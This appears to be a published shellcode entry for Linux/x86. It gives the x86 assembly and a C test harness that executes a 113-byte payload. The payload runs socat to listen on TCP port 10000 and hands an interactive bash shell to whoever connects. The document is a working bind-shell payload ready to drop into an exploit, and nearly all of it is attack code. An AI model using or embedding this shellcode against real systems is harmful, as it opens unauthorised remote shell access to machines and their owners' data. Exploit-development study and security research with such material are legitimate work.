/* Exploit Title: Linux/x86 - Socat Bind Shellcode (113 bytes)
  Date: 01-19-2021
  Author: Felipe Winsnes
  Tested on: Debian x86
  Shellcode Length: 113

global _start

section .text

_start:

        xor eax, eax
        push eax

        PUSH 0x30303030 ; "tcp-listen:10000"
        PUSH 0x313a6e65
        PUSH 0x7473696c
        PUSH 0x2d706374

        mov esi, esp
        push eax

        PUSH 0x2c656e61 ; "exec:'bash',pty,stderr,setsid,sigint,sane,"
        PUSH 0x732c746e
        PUSH 0x69676973
        PUSH 0x2c646973
        PUSH 0x7465732c
        PUSH 0x72726564
        PUSH 0x74732c79
        PUSH 0x74702c68
        PUSH 0x7361623a
        PUSH 0x63657865

        mov edi, esp
        push eax

        PUSH 0x7461636f ; "///usr/bin/socat"
        PUSH 0x732f6e69
        PUSH 0x622f7273
        PUSH 0x752f2f2f

        mov ebx, esp
        push eax

        mov edx, esp

        push esi
        push edi
        push ebx

        mov ecx, esp
        mov al, 11
        int 0x80
*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x50\x68\x30\x30\x30\x30\x68\x65\x6e\x3a\x31\x68\x6c\x69\x73\x74\x68\x74\x63\x70\x2d\x89\xe6\x50\x68\x61\x6e\x65\x2c\x68\x6e\x74\x2c\x73\x68\x73\x69\x67\x69\x68\x73\x69\x64\x2c\x68\x2c\x73\x65\x74\x68\x64\x65\x72\x72\x68\x79\x2c\x73\x74\x68\x68\x2c\x70\x74\x68\x3a\x62\x61\x73\x68\x65\x78\x65\x63\x89\xe7\x50\x68\x6f\x63\x61\x74\x68\x69\x6e\x2f\x73\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x89\xe2\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";

main()
{

  printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}